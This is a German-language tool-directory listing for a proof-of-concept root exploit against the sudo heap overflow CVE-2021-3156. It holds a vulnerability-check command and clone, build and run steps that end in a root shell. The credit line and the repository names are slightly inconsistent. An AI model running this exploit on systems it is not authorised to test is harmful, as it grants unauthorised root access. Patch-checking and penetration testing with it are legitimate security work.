Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-3156 — Proof-of-concept-Exploit für CVE-2021-3156, einen heap-basierten Pufferüberlauf in sudo vor Version 1.9.5p2, der eine Privilegieneskalation zu root über sudoedit -s ermöglicht. | Kitploit
Tools/GitHubGitHub/sbladiamond/cve-2021-3156
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubsbladiamond/cve-2021-3156

CVE-2021-3156

Proof-of-concept-Exploit für CVE-2021-3156, einen heap-basierten Pufferüberlauf in sudo vor Version 1.9.5p2, der eine Privilegieneskalation zu root über sudoedit -s ermöglicht.

Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3156

Sudo vor 1.9.5p2 enthält einen Off-by-One-Fehler, der zu einem Heap-basierten Pufferüberlauf führen kann, der eine Privilegieneskalation zu root über sudoedit -s und ein Befehlszeilenargument ermöglicht, das mit einem einzelnen Backslash-Zeichen endet.

Credit: Hinweis von Baron Samedit of Qualys

So überprüfen Sie, ob Sie betroffen sind.

Das sudo-Projekt hat einen Befehl veröffentlicht, mit dem Sie testen können, ob Ihre Version von sudo anfällig ist:

root@kitploit:~
sudoedit -s '\' `perl -e 'print "A" x 65536'`

Wenn Sie eine Verwendungs- oder Fehlermeldung erhalten, ist sudo nicht anfällig. Wenn das Ergebnis ein Segmentation Fault ist, ist sudo anfällig.

Verwendung

Root-Shell-PoC für CVE-2021-3156 (ohne Brute-Force) Getestet auf Ubuntu 20.04 (sudo 1.8.31)

root@kitploit:~
$ git clone https://github.com/CyberCommands/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
$ ./exploit
# whoami
root
Tool herunterladen